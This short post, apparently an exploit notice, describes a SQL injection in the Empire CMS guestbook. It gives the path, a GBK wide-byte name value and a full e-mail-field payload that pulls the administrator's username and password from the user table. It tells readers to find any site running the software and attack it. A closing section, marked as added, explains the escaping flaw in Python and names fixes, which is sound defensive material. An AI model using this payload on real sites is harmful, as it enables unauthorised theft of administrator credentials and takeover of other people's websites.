Empire CMS (帝国CMS) Website Software 0day

Find a site running Empire CMS and append the following directly to its URL:

e/tool/gbook/?bid=1

This brings up the Empire CMS guestbook. In the name field, enter:

縗\

In the contact e-mail field, enter:

,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*

After submitting, the account name and password are disclosed.

via:amxking
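
Why the name value above matters to a defender, as an added example (not code from the original post or from Empire CMS). It assumes the guestbook escapes input byte by byte, as PHP's `addslashes()` does, while the database parses the statement as GBK; the function names are hypothetical and the benign inputs are constructed.

```python
# Added example: constructed input, not Empire CMS code.
# Assumption: input is escaped byte by byte (as PHP addslashes does) and the
# database then parses the statement as GBK.

QUOTES_AND_BACKSLASH = (0x27, 0x22, 0x5C)


def bytewise_escape(raw: bytes) -> bytes:
    """Prefix ', " and \\ with a backslash, one byte at a time (charset-blind)."""
    out = bytearray()
    for b in raw:
        if b in QUOTES_AND_BACKSLASH:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def charset_aware_escape(text: str) -> bytes:
    """Escape whole characters first, then encode the result to GBK."""
    escaped = "".join("\\" + c if c in "'\"\\" else c for c in text)
    return escaped.encode("gbk")


def breaks_out_of_literal(data: bytes) -> bool:
    """Read escaped bytes as a GBK parser would and report whether the value
    holds an unescaped quote or ends in an unpaired backslash, which would
    swallow the closing quote of its string literal."""
    i, n, escaped_next = 0, len(data), False
    while i < n:
        b = data[i]
        # Two-byte GBK character: the trail byte may itself be 0x5C.
        wide = (0x81 <= b <= 0xFE and i + 1 < n
                and 0x40 <= data[i + 1] <= 0xFE and data[i + 1] != 0x7F)
        if escaped_next:
            escaped_next = False      # this byte was escaped by the previous one
        elif b == 0x5C:
            escaped_next = True       # a real backslash as the parser sees it
        elif b in (0x27, 0x22):
            return True               # quote with no backslash in front of it
        i += 2 if wide else 1
    return escaped_next


# The name value from the post: one GBK character (bytes BF 5C) plus a backslash.
NAME_FIELD = "縗\\"

if __name__ == "__main__":
    raw = NAME_FIELD.encode("gbk")
    print(bytewise_escape(raw).hex(), breaks_out_of_literal(bytewise_escape(raw)))
    print(breaks_out_of_literal(charset_aware_escape(NAME_FIELD)))
```

Under byte-wise escaping the name value ends in an unpaired backslash once read as GBK, so the field's closing quote is swallowed and the e-mail field is parsed as SQL. Prepared statements, or `mysqli_set_charset()` combined with `mysqli_real_escape_string()`, keep the escaping and the connection character set in agreement.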

